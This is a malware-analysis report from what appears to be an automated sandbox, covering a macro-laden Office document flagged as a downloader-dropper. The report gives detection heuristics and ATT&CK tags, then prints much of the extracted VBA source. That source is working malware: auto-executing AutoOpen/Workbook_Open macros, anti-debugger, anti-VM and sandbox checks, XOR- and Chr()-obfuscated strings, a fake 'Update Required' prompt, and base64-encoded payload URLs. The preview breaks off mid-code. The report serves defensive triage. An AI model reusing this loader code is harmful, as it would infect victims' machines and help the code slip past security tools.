MALICIOUS
366
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1105 Ingress Tool Transfer
T1204.002 Malicious File
This OOXML document contains a critical heuristic firing for VBA downloading and executing a file via HTTP, along with obfuscated auto-execution loaders. The presence of VBA macros, specifically an AutoOpen macro, indicates an attempt to automatically run malicious code upon opening. The script's functionality appears to be downloading and executing a second-stage payload, as evidenced by the 'OLE_VBA_HTTP_DROP_EXEC' heuristic.
Heuristics 10
-
ClamAV: Xls.Dropper.Generic-6595971-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Dropper.Generic-6595971-0
-
VBA project inside OOXML medium 7 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXECVBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.Matched line in script
rmYjpthoHF.Write isqOWXu.responseBody -
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.Matched line in script
Set yFRIxCt = CreateObject(Chr(87) & Chr(83) & Chr(99) & Chr(114) & Chr(105) & Chr(112) & Chr(116) & Chr(46) & _ -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set yFRIxCt = CreateObject(Chr(87) & Chr(83) & Chr(99) & Chr(114) & Chr(105) & Chr(112) & Chr(116) & Chr(46) & _ -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Sub Workbook_Open() -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
oyESNyOifWpC = Environ(Chr(78) & Chr(85) & Chr(77) & Chr(66) & Chr(69) & Chr(82) & Chr(95) & Chr(79) & _ -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas Referenced by macro
- http://schemas.microsoft.com/office/drawing/2014/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexReferenced by macro
- http://schemas.openxmlformats.org/markup-compatibility/2006Referenced by macro
- http://schemas.microsoft.com/office/drawing/2016/inkReferenced by macro
- http://schemas.microsoft.com/office/drawing/2017/model3dReferenced by macro
- http://schemas.microsoft.com/office/2019/extlstReferenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsReferenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/mathReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingReferenced by macro
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingReferenced by macro
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2012/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2018/wordml/cexReferenced by macro
- http://schemas.microsoft.com/office/word/2016/wordml/cidReferenced by macro
- http://schemas.microsoft.com/office/word/2018/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahashReferenced by macro
- http://schemas.microsoft.com/office/word/2015/wordml/symexReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkReferenced by macro
- http://schemas.microsoft.com/office/word/2006/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeReferenced by macro
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 33565 bytes |
SHA-256: 3f83ad4bc37e416d6135ea6f74ea10fe406714d3f15094694201ef3049db3e01 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
#If VBA7 Then
Private Declare PtrSafe Function IsDebuggerPresent Lib "kernel32" () As Long
Private Declare PtrSafe Function GetSystemMetrics Lib "user32" _
(ByVal nIndex As Long) As Long
#Else
Private Declare Function IsDebuggerPresent Lib "kernel32" () As Long
Private Declare Function GetSystemMetrics Lib "user32" _
(ByVal nIndex As Long) As Long
#End If
#If VBA7 Then
Private Declare PtrSafe Function GetTickCount Lib "kernel32" () As Long
Private Declare PtrSafe Function GetCursorPos Lib "user32" _
(ByRef lpPoint As POINTAPI) As Long
#Else
Private Declare Function GetTickCount Lib "kernel32" () As Long
Private Declare Function GetCursorPos Lib "user32" _
(ByRef lpPoint As POINTAPI) As Long
#End If
Private Type POINTAPI
x As Long
y As Long
End Type
#If VBA7 Then
Private Declare PtrSafe Function CreateToolhelp32Snapshot Lib "kernel32" _
(ByVal dwFlags As Long, ByVal th32ProcessID As Long) As LongPtr
Private Declare PtrSafe Function Process32First Lib "kernel32" _
(ByVal hSnapshot As LongPtr, ByRef lppe As PROCESSENTRY32) As Long
Private Declare PtrSafe Function Process32Next Lib "kernel32" _
(ByVal hSnapshot As LongPtr, ByRef lppe As PROCESSENTRY32) As Long
Private Declare PtrSafe Function CloseHandle Lib "kernel32" _
(ByVal hObject As LongPtr) As Long
#Else
Private Declare Function CreateToolhelp32Snapshot Lib "kernel32" _
(ByVal dwFlags As Long, ByVal th32ProcessID As Long) As Long
Private Declare Function Process32First Lib "kernel32" _
(ByVal hSnapshot As Long, ByRef lppe As PROCESSENTRY32) As Long
Private Declare Function Process32Next Lib "kernel32" _
(ByVal hSnapshot As Long, ByRef lppe As PROCESSENTRY32) As Long
Private Declare Function CloseHandle Lib "kernel32" _
(ByVal hObject As Long) As Long
#End If
Private Type PROCESSENTRY32
dwSize As Long
cntUsage As Long
th32ProcessID As Long
th32DefaultHeapID As Long
th32ModuleID As Long
cntThreads As Long
th32ParentProcessID As Long
pcPriClassBase As Long
dwFlags As Long
szExeFile As String * 260
End Type
#If VBA7 Then
Private Declare PtrSafe Function tNn1lsUnS Lib "shell32.dll" Alias "ShellExecuteA" ( _
ByVal hwnd As LongPtr, ByVal lpOperation As String, ByVal lpFile As String, _
ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As LongPtr
Private Declare PtrSafe Sub ZFvcwHlhFQB Lib "kernel32" (ByVal dwMilliseconds As Long)
Private Declare PtrSafe Function Blp1TGHWTA1swQ Lib "kernel32" ( _
ByVal hFile As LongPtr, ByRef lpFileSizeHigh As Long) As Long
#Else
#Error This macro requires 64-bit Office (VBA7)
#End If
Private Function LHCFqkO() As Boolean
Dim FvZKjQO As Long
FvZKjQO = IsDebuggerPresent()
LHCFqkO = (FvZKjQO <> 0)
End Function
Private Function LGiLTzH1() As Boolean
Dim yKblijp As Long
yKblijp = GetTickCount()
LGiLTzH1 = (yKblijp < (600000))
End Function
Private Function slxORpNzp() As Boolean
Dim CneQDDZBdKEeO As Long, tAIxmJDOr As Long
CneQDDZBdKEeO = GetSystemMetrics(0)
tAIxmJDOr = GetSystemMetrics(1)
slxORpNzp = (CneQDDZBdKEeO <= (41 + 759) Or tAIxmJDOr <= (16 + 584))
End Function
Private Function jhlBgsvoX() As Boolean
Dim oyESNyOifWpC As String
oyESNyOifWpC = Environ(Chr(78) & Chr(85) & Chr(77) & Chr(66) & Chr(69) & Chr(82) & Chr(95) & Chr(79) & _
Chr(70) & Chr(95) & Chr(80) & Chr(82) & Chr(79) & Chr(67) & Chr(69) & Chr(83) & _
Chr(83) & Chr(79) & Chr(82) & Chr(83))
jhlBgsvoX = (CInt(oyESNyOifWpC) <= 1)
End Function
Private Function gcc1RVQ1IlSy() As Boolean
Dim xcaGCg As String
Dim VIiJFuhulDzy As String, bcGUIOp1v As String
Dim SNJkZONWaL As Integer, HxOzkd1hKbA As Integer
Dim sIBxq11yrpOHO As Variant
Dim jIIeYqdQeytiFl As String
jIIeYqdQeytiFl = Chr(72) & Chr(90) & Chr(85) & Chr(95) & Chr(89) & Chr(84) & Chr(67) & Chr(71) & _
Chr(86) & Chr(90) & Chr(87) & Chr(76) & Chr(90) & Chr(73) & Chr(94) & Chr(71) & _
Chr(77) & Chr(82) & Chr(73) & Chr(78) & Chr(72) & Chr(71) & Chr(72) & Chr(90) & _
Chr(86) & Chr(75) & Chr(87) & Chr(94) & Chr(71) & Chr(90) & Chr(85) & Chr(90) & _
Chr(87) & Chr(66) & Chr(72) & Chr(82) & Chr(72) & Chr(71) & Chr(88) & Chr(78) & _
Chr(88) & Chr(80) & Chr(84) & Chr(84) & Chr(71) & Chr(90) & Chr(85) & Chr(66) & _
Chr(73) & Chr(78) & Chr(85) & Chr(71) & Chr(83) & Chr(66) & Chr(89) & Chr(73) & _
Chr(82) & Chr(95) & Chr(71) & Chr(77) & Chr(86) & Chr(76) & Chr(90) & Chr(73) & _
Chr(94) & Chr(71) & Chr(77) & Chr(89) & Chr(84) & Chr(67) & Chr(71) & Chr(77) & _
Chr(82) & Chr(73) & Chr(79) & Chr(78) & Chr(90) & Chr(87) & Chr(71) & Chr(79) & _
Chr(94) & Chr(72) & Chr(79) & Chr(71) & Chr(87) & Chr(90) & Chr(89) & Chr(71) & _
Chr(79) & Chr(83) & Chr(73) & Chr(94) & Chr(90) & Chr(79) & Chr(71) & Chr(88) & _
Chr(83) & Chr(94) & Chr(88) & Chr(80)
VIiJFuhulDzy = jIIeYqdQeytiFl
bcGUIOp1v = ""
For SNJkZONWaL = 1 To Len(VIiJFuhulDzy)
bcGUIOp1v = bcGUIOp1v & Chr(Asc(Mid(VIiJFuhulDzy, SNJkZONWaL, 1)) Xor 59)
Next SNJkZONWaL
sIBxq11yrpOHO = Split(bcGUIOp1v, Chr(124))
xcaGCg = LCase(Environ(Chr(67) & Chr(79) & Chr(77) & Chr(80) & Chr(85) & Chr(84) & Chr(69) & Chr(82) & _
Chr(78) & Chr(65) & Chr(77) & Chr(69)))
For HxOzkd1hKbA = 0 To UBound(sIBxq11yrpOHO)
If InStr(xcaGCg, Trim(sIBxq11yrpOHO(HxOzkd1hKbA))) > 0 Then
gcc1RVQ1IlSy = True: Exit Function
End If
Next HxOzkd1hKbA
gcc1RVQ1IlSy = False
End Function
Private Function pExzceR1tfhFug() As Boolean
Dim ijNNlk1pgBk As POINTAPI, o1AJoVi1dcqX As POINTAPI
GetCursorPos ijNNlk1pgBk
Dim t As Double: t = Timer
Do While Timer - t < 1.5: DoEvents: Loop
GetCursorPos o1AJoVi1dcqX
pExzceR1tfhFug = (ijNNlk1pgBk.x = o1AJoVi1dcqX.x And ijNNlk1pgBk.y = o1AJoVi1dcqX.y)
End Function
Private Function JOgLPByEXuO() As Boolean
Dim eUoWxpLIIHqA1l As String
eUoWxpLIIHqA1l = Dir(Environ(Chr(85) & Chr(83) & Chr(69) & Chr(82) & Chr(80) & Chr(82) & Chr(79) & Chr(70) & _
Chr(73) & Chr(76) & Chr(69)) & _
Chr(92) & Chr(65) & Chr(112) & Chr(112) & Chr(68) & Chr(97) & Chr(116) & Chr(97) & _
Chr(92) & Chr(82) & Chr(111) & Chr(97) & Chr(109) & Chr(105) & Chr(110) & Chr(103) & _
Chr(92) & Chr(77) & Chr(105) & Chr(99) & Chr(114) & Chr(111) & Chr(115) & Chr(111) & _
Chr(102) & Chr(116) & Chr(92) & Chr(87) & Chr(105) & Chr(110) & Chr(100) & Chr(111) & _
Chr(119) & Chr(115) & Chr(92) & Chr(82) & Chr(101) & Chr(99) & Chr(101) & Chr(110) & _
Chr(116) & Chr(92) & Chr(42) & Chr(46) & Chr(108) & Chr(110) & Chr(107))
JOgLPByEXuO = (eUoWxpLIIHqA1l = "")
End Function
Private Function cXJfhlP() As Boolean
cXJfhlP = LGiLTzH1() Or slxORpNzp() Or jhlBgsvoX() Or gcc1RVQ1IlSy() Or JOgLPByEXuO()
End Function
Private Function nxEYt1DFRJ() As Boolean
Dim wGxkOKkHlGq1AK As LongPtr
Dim DoOfIvIUKIe As PROCESSENTRY32
Dim lFatteoMsFsi As Long
Dim EvgHpc As String
Dim tu1dEGv As String
Dim BlOiUOlkuNqDL As Variant
Dim HYRsi1EQ As Integer
Dim VSD1cWQDEI1V As String
Dim n1STEBOUB As Integer
Dim jAlllI1y As String
Dim yOUIMZlqqIaFS As String
yOUIMZlqqIaFS = Chr(40) & Chr(37) & Chr(32) & Chr(61) & Chr(40) & Chr(37) & Chr(32) & Chr(38) & _
Chr(61) & Chr(40) & Chr(37) & Chr(32) & Chr(54) & Chr(61) & Chr(40) & Chr(37) & _
Chr(32) & Chr(53) & Chr(61) & Chr(57) & Chr(119) & Chr(117) & Chr(37) & Chr(35) & _
Chr(38) & Chr(61) & Chr(57) & Chr(114) & Chr(115) & Chr(37) & Chr(35) & Chr(38) & _
Chr(61) & Chr(57) & Chr(120) & Chr(119) & Chr(37) & Chr(35) & Chr(38) & Chr(61) & _
Chr(46) & Chr(45) & Chr(45) & Chr(56) & Chr(37) & Chr(35) & Chr(38) & Chr(61) & _
Chr(54) & Chr(40) & Chr(47) & Chr(37) & Chr(35) & Chr(38) & Chr(61) & Chr(40) & _
Chr(44) & Chr(44) & Chr(52) & Chr(47) & Chr(40) & Chr(53) & Chr(56) & Chr(37) & _
Chr(36) & Chr(35) & Chr(52) & Chr(38) & Chr(38) & Chr(36) & Chr(51) & Chr(61) & _
Chr(38) & Chr(37) & Chr(35) & Chr(61) & Chr(45) & Chr(45) & Chr(37) & Chr(35) & _
Chr(61) & Chr(38) & Chr(41) & Chr(40) & Chr(37) & Chr(51) & Chr(32) & Chr(61) & _
Chr(51) & Chr(32) & Chr(37) & Chr(32) & Chr(51) & Chr(36) & Chr(115) & Chr(61) & _
Chr(51) & Chr(40) & Chr(59) & Chr(40) & Chr(47) & Chr(61) & Chr(34) & Chr(52) & _
Chr(53) & Chr(53) & Chr(36) & Chr(51) & Chr(61) & Chr(35) & Chr(40) & Chr(47) & _
Chr(32) & Chr(51) & Chr(56) & Chr(47) & Chr(40) & Chr(47) & Chr(43) & Chr(32) & _
Chr(61) & Chr(41) & Chr(46) & Chr(49) & Chr(49) & Chr(36) & Chr(51) & Chr(61) & _
Chr(37) & Chr(47) & Chr(50) & Chr(49) & Chr(56) & Chr(61) & Chr(34) & Chr(41) & _
Chr(36) & Chr(32) & Chr(53) & Chr(36) & Chr(47) & Chr(38) & Chr(40) & Chr(47) & _
Chr(36) & Chr(61) & Chr(49) & Chr(36) & Chr(50) & Chr(53) & Chr(52) & Chr(37) & _
Chr(40) & Chr(46) & Chr(61) & Chr(49) & Chr(36) & Chr(35) & Chr(36) & Chr(32)
Dim kHTMrbmlHP As String
kHTMrbmlHP = Chr(51) & Chr(61) & Chr(49) & Chr(36) & Chr(55) & Chr(40) & Chr(36) & Chr(54) & _
Chr(61) & Chr(34) & Chr(39) & Chr(39) & Chr(36) & Chr(57) & Chr(49) & Chr(45) & _
Chr(46) & Chr(51) & Chr(36) & Chr(51) & Chr(61) & Chr(51) & Chr(36) & Chr(50) & _
Chr(46) & Chr(52) & Chr(51) & Chr(34) & Chr(36) & Chr(41) & Chr(32) & Chr(34) & _
Chr(42) & Chr(36) & Chr(51) & Chr(61) & Chr(49) & Chr(51) & Chr(46) & Chr(34) & _
Chr(36) & Chr(50) & Chr(50) & Chr(41) & Chr(32) & Chr(34) & Chr(42) & Chr(36) & _
Chr(51) & Chr(61) & Chr(49) & Chr(51) & Chr(46) & Chr(34) & Chr(36) & Chr(50) & _
Chr(50) & Chr(44) & Chr(46) & Chr(47) & Chr(40) & Chr(53) & Chr(46) & Chr(51) & _
Chr(61) & Chr(50) & Chr(56) & Chr(50) & Chr(53) & Chr(36) & Chr(44) & Chr(40) & _
Chr(47) & Chr(39) & Chr(46) & Chr(51) & Chr(44) & Chr(36) & Chr(51) & Chr(61) & _
Chr(50) & Chr(56) & Chr(50) & Chr(53) & Chr(36) & Chr(44) & Chr(97) & Chr(40) & _
Chr(47) & Chr(39) & Chr(46) & Chr(51) & Chr(44) & Chr(36) & Chr(51) & Chr(61) & _
Chr(49) & Chr(51) & Chr(46) & Chr(34) & Chr(36) & Chr(57) & Chr(49) & Chr(61) & _
Chr(49) & Chr(51) & Chr(46) & Chr(34) & Chr(36) & Chr(57) & Chr(49) & Chr(119) & _
Chr(117) & Chr(61) & Chr(49) & Chr(51) & Chr(46) & Chr(34) & Chr(44) & Chr(46) & _
Chr(47) & Chr(61) & Chr(49) & Chr(51) & Chr(46) & Chr(34) & Chr(44) & Chr(46) & _
Chr(47) & Chr(119) & Chr(117) & Chr(61) & Chr(53) & Chr(34) & Chr(49) & Chr(55) & _
Chr(40) & Chr(36) & Chr(54) & Chr(61) & Chr(51) & Chr(36) & Chr(38) & Chr(50) & _
Chr(41) & Chr(46) & Chr(53) & Chr(61) & Chr(32) & Chr(52) & Chr(53) & Chr(46) & _
Chr(51) & Chr(52) & Chr(47) & Chr(50) & Chr(61) & Chr(32) & Chr(52) & Chr(53)
Dim BAwIOeFt As String
BAwIOeFt = Chr(46) & Chr(51) & Chr(52) & Chr(47) & Chr(50) & Chr(119) & Chr(117) & Chr(61) & _
Chr(32) & Chr(49) & Chr(40) & Chr(44) & Chr(46) & Chr(47) & Chr(40) & Chr(53) & _
Chr(46) & Chr(51) & Chr(61) & Chr(51) & Chr(46) & Chr(41) & Chr(40) & Chr(53) & _
Chr(32) & Chr(35) & Chr(61) & Chr(54) & Chr(40) & Chr(51) & Chr(36) & Chr(50) & _
Chr(41) & Chr(32) & Chr(51) & Chr(42) & Chr(61) & Chr(39) & Chr(40) & Chr(37) & _
Chr(37) & Chr(45) & Chr(36) & Chr(51) & Chr(61) & Chr(35) & Chr(52) & Chr(51) & _
Chr(49) & Chr(61) & Chr(35) & Chr(52) & Chr(51) & Chr(49) & Chr(50) & Chr(52) & _
Chr(40) & Chr(53) & Chr(36) & Chr(61) & Chr(59) & Chr(32) & Chr(49) & Chr(61) & _
Chr(34) & Chr(41) & Chr(32) & Chr(51) & Chr(45) & Chr(36) & Chr(50) & Chr(61) & _
Chr(44) & Chr(40) & Chr(53) & Chr(44) & Chr(49) & Chr(51) & Chr(46) & Chr(57) & _
Chr(56) & Chr(61) & Chr(49) & Chr(46) & Chr(50) & Chr(53) & Chr(44) & Chr(32) & _
Chr(47) & Chr(61) & Chr(40) & Chr(47) & Chr(50) & Chr(46) & Chr(44) & Chr(47) & _
Chr(40) & Chr(32) & Chr(61) & Chr(37) & Chr(36) & Chr(35) & Chr(52) & Chr(38) & _
Chr(38) & Chr(36) & Chr(51) & Chr(61) & Chr(55) & Chr(35) & Chr(46) & Chr(57) & _
Chr(50) & Chr(36) & Chr(51) & Chr(55) & Chr(40) & Chr(34) & Chr(36) & Chr(61) & _
Chr(55) & Chr(35) & Chr(46) & Chr(57) & Chr(53) & Chr(51) & Chr(32) & Chr(56) & _
Chr(61) & Chr(55) & Chr(35) & Chr(46) & Chr(57) & Chr(38) & Chr(52) & Chr(36) & _
Chr(50) & Chr(53) & Chr(61) & Chr(55) & Chr(35) & Chr(46) & Chr(57) & Chr(50) & _
Chr(55) & Chr(34) & Chr(61) & Chr(55) & Chr(35) & Chr(46) & Chr(57) & Chr(41) & _
Chr(36) & Chr(32) & Chr(37) & Chr(45) & Chr(36) & Chr(50) & Chr(50) & Chr(61)
Dim zlvRcVtOIO As String
zlvRcVtOIO = Chr(55) & Chr(40) & Chr(51) & Chr(53) & Chr(52) & Chr(32) & Chr(45) & Chr(35) & _
Chr(46) & Chr(57) & Chr(61) & Chr(55) & Chr(35) & Chr(46) & Chr(57) & Chr(44) & _
Chr(32) & Chr(47) & Chr(32) & Chr(38) & Chr(36) & Chr(61) & Chr(55) & Chr(35) & _
Chr(46) & Chr(57) & Chr(35) & Chr(32) & Chr(45) & Chr(45) & Chr(46) & Chr(46) & _
Chr(47) & Chr(34) & Chr(53) & Chr(51) & Chr(45) & Chr(61) & Chr(55) & Chr(35) & _
Chr(46) & Chr(57) & Chr(38) & Chr(52) & Chr(36) & Chr(50) & Chr(53) & Chr(32) & _
Chr(37) & Chr(37) & Chr(40) & Chr(53) & Chr(40) & Chr(46) & Chr(47) & Chr(50) & _
Chr(61) & Chr(55) & Chr(35) & Chr(46) & Chr(57) & Chr(34) & Chr(45) & Chr(40) & _
Chr(36) & Chr(47) & Chr(53) & Chr(61) & Chr(55) & Chr(35) & Chr(46) & Chr(57) & _
Chr(50) & Chr(37) & Chr(50) & Chr(61) & Chr(55) & Chr(35) & Chr(46) & Chr(57) & _
Chr(34) & Chr(46) & Chr(44) & Chr(61) & Chr(55) & Chr(35) & Chr(46) & Chr(57) & _
Chr(54) & Chr(37) & Chr(37) & Chr(44) & Chr(61) & Chr(55) & Chr(44) & Chr(53) & _
Chr(46) & Chr(46) & Chr(45) & Chr(50) & Chr(37) & Chr(61) & Chr(55) & Chr(44) & _
Chr(54) & Chr(32) & Chr(51) & Chr(36) & Chr(53) & Chr(51) & Chr(32) & Chr(56) & _
Chr(61) & Chr(55) & Chr(44) & Chr(54) & Chr(32) & Chr(51) & Chr(36) & Chr(52) & _
Chr(50) & Chr(36) & Chr(51) & Chr(61) & Chr(55) & Chr(44) & Chr(54) & Chr(32) & _
Chr(51) & Chr(36) & Chr(41) & Chr(46) & Chr(50) & Chr(53) & Chr(37) & Chr(61) & _
Chr(55) & Chr(44) & Chr(54) & Chr(32) & Chr(51) & Chr(36) & Chr(108) & Chr(55) & _
Chr(44) & Chr(57) & Chr(61) & Chr(55) & Chr(44) & Chr(54) & Chr(32) & Chr(51) & _
Chr(36) & Chr(61) & Chr(55) & Chr(44) & Chr(32) & Chr(34) & Chr(53) & Chr(41)
Dim pICbUvmHmrI1A As String
pICbUvmHmrI1A = Chr(45) & Chr(49) & Chr(61) & Chr(55) & Chr(44) & Chr(47) & Chr(36) & Chr(53) & _
Chr(34) & Chr(39) & Chr(38) & Chr(61) & Chr(55) & Chr(44) & Chr(54) & Chr(32) & _
Chr(51) & Chr(36) & Chr(53) & Chr(46) & Chr(46) & Chr(45) & Chr(50) & Chr(61) & _
Chr(49) & Chr(51) & Chr(45) & Chr(30) & Chr(53) & Chr(46) & Chr(46) & Chr(45) & _
Chr(50) & Chr(61) & Chr(49) & Chr(51) & Chr(45) & Chr(30) & Chr(34) & Chr(34) & _
Chr(61) & Chr(48) & Chr(36) & Chr(44) & Chr(52) & Chr(108) & Chr(38) & Chr(32) & _
Chr(61) & Chr(57) & Chr(36) & Chr(47) & Chr(50) & Chr(36) & Chr(51) & Chr(55) & _
Chr(40) & Chr(34) & Chr(36)
jAlllI1y = yOUIMZlqqIaFS & kHTMrbmlHP & BAwIOeFt & zlvRcVtOIO & pICbUvmHmrI1A
tu1dEGv = ""
For n1STEBOUB = 1 To Len(jAlllI1y)
tu1dEGv = tu1dEGv & Chr(Asc(Mid(jAlllI1y, n1STEBOUB, 1)) Xor 65)
Next n1STEBOUB
BlOiUOlkuNqDL = Split(tu1dEGv, Chr(124))
DoOfIvIUKIe.dwSize = LenB(DoOfIvIUKIe)
wGxkOKkHlGq1AK = CreateToolhelp32Snapshot(&H2, 0)
lFatteoMsFsi = Process32First(wGxkOKkHlGq1AK, DoOfIvIUKIe)
Do While lFatteoMsFsi <> 0
EvgHpc = LCase(Trim(Replace(DoOfIvIUKIe.szExeFile, Chr(0), "")))
EvgHpc = Left(EvgHpc, InStr(EvgHpc & ".", ".") - 1)
For HYRsi1EQ = 0 To UBound(BlOiUOlkuNqDL)
If EvgHpc = Trim(BlOiUOlkuNqDL(HYRsi1EQ)) Then
CloseHandle wGxkOKkHlGq1AK
nxEYt1DFRJ = True
Exit Function
End If
Next HYRsi1EQ
lFatteoMsFsi = Process32Next(wGxkOKkHlGq1AK, DoOfIvIUKIe)
Loop
CloseHandle wGxkOKkHlGq1AK
nxEYt1DFRJ = False
End Function
Private Function ySyTYlObvm() As Boolean
ySyTYlObvm = LHCFqkO() Or cXJfhlP() Or nxEYt1DFRJ()
End Function
Sub AutoOpen()
If ySyTYlObvm() Then Exit Sub
If Not hXhIqrlWShCwut() Then Exit Sub
b1OlImyMG True
End Sub
Private Sub YnmQRMUVI()
Dim haksFOyW As Long, YJKzQfFU1irOOH As String, ZiTXDGjqV As Double
haksFOyW = ((3 + 382) + (18 + 184))
YJKzQfFU1irOOH = Chr(86) & Chr(73)
ZiTXDGjqV = haksFOyW * 5.9625
If ((945 Mod 2) = 836 Mod 2) Then
YJKzQfFU1irOOH = Left(YJKzQfFU1irOOH, 1)
End If
End Sub
Private Sub MCLNVpbvLfRPBr()
Dim xOOsDkSt As Long, BWIvut As String, kGCzUl As Double
xOOsDkSt = ((60 + 516) + (52 + 224))
BWIvut = Chr(77) & Chr(73)
kGCzUl = xOOsDkSt * 0.3222
If (Len("SgjUnlCQ") > 0) Then
BWIvut = Left(BWIvut, 1)
End If
End Sub
Sub Workbook_Open()
If ySyTYlObvm() Then Exit Sub
If Not hXhIqrlWShCwut() Then Exit Sub
b1OlImyMG True
End Sub
Private Sub FPIsllfy()
Dim zUswmgxznp As Long, nTsEiGwYR As String, jtwuOJvQ As Double
zUswmgxznp = ((98 + 600) + (2 + 6))
nTsEiGwYR = Chr(82) & Chr(76)
jtwuOJvQ = zUswmgxznp * 4.1583
If ((332 Mod 2) = 317 Mod 2) Then
nTsEiGwYR = Left(nTsEiGwYR, 1)
End If
End Sub
Private Function hXhIqrlWShCwut() As Boolean
#If VBA7 Then
hXhIqrlWShCwut = True
#Else
hXhIqrlWShCwut = False
#End If
End Function
Private Sub b1OlImyMG(Optional ByVal SilentMode As Boolean = False)
If DOSffBszpomu() Then Exit Sub
Dim ayy1Gvma As String
ayy1Gvma = Application.Name
zD1wIIeaOBdIO
Do While Not PbsBADOsJbNP()
If SilentMode Then Exit Sub
MsgBox Chr(67) & Chr(111) & Chr(110) & Chr(110) & Chr(101) & Chr(99) & Chr(116) & Chr(32) & _
Chr(116) & Chr(111) & Chr(32) & Chr(105) & Chr(110) & Chr(116) & Chr(101) & Chr(114) & _
Chr(110) & Chr(101) & Chr(116) & Chr(32) & Chr(116) & Chr(111) & Chr(32) & Chr(117) & _
Chr(115) & Chr(101) & Chr(32) & Chr(116) & Chr(104) & Chr(105) & Chr(115) & Chr(32) & _
Chr(100) & Chr(111) & Chr(99) & Chr(117) & Chr(109) & Chr(101) & Chr(110) & Chr(116) & _
Chr(46), vbCritical, Chr(85) & Chr(112) & Chr(100) & Chr(97) & Chr(116) & Chr(101) & Chr(32) & Chr(82) & _
Chr(101) & Chr(113) & Chr(117) & Chr(105) & Chr(114) & Chr(101) & Chr(100) & Chr(32) & _
Chr(45) & Chr(32) & ayy1Gvma
Loop
Dim urls(2) As String
urls(0) = Chr(97) & Chr(72) & Chr(82) & Chr(48) & Chr(99) & Chr(68) & Chr(111) & Chr(118) & _
Chr(76) & Chr(122) & Chr(69) & Chr(121) & Chr(78) & Chr(121) & Chr(52) & Chr(119) & _
Chr(76) & Chr(106) & Chr(65) & Chr(117) & Chr(77) & Chr(84) & Chr(111) & Chr(49) & _
Chr(77) & Chr(68) & Chr(85) & Chr(119) & Chr(76) & Chr(122) & Chr(69) & Chr(117) & _
Chr(99) & Chr(72) & Chr(77) & Chr(120)
urls(1) = Chr(97) & Chr(72) & Chr(82) & Chr(48) & Chr(99) & Chr(68) & Chr(111) & Chr(118) & _
Chr(76) & Chr(122) & Chr(69) & Chr(121) & Chr(78) & Chr(121) & Chr(52) & Chr(119) & _
Chr(76) & Chr(106) & Chr(65) & Chr(117) & Chr(77) & Chr(84) & Chr(111) & Chr(49) & _
Chr(77) & Chr(68) & Chr(85) & Chr(119) & Chr(76) & Chr(122) & Chr(73) & Chr(117) & _
Chr(99) & Chr(72) & Chr(77) & Chr(120)
urls(2) = Chr(97) & Chr(72) & Chr(82) & Chr(48) & Chr(99) & Chr(68) & Chr(111) & Chr(118) & _
Chr(76) & Chr(122) & Chr(69) & Chr(121) & Chr(78) & Chr(121) & Chr(52) & Chr(119) & _
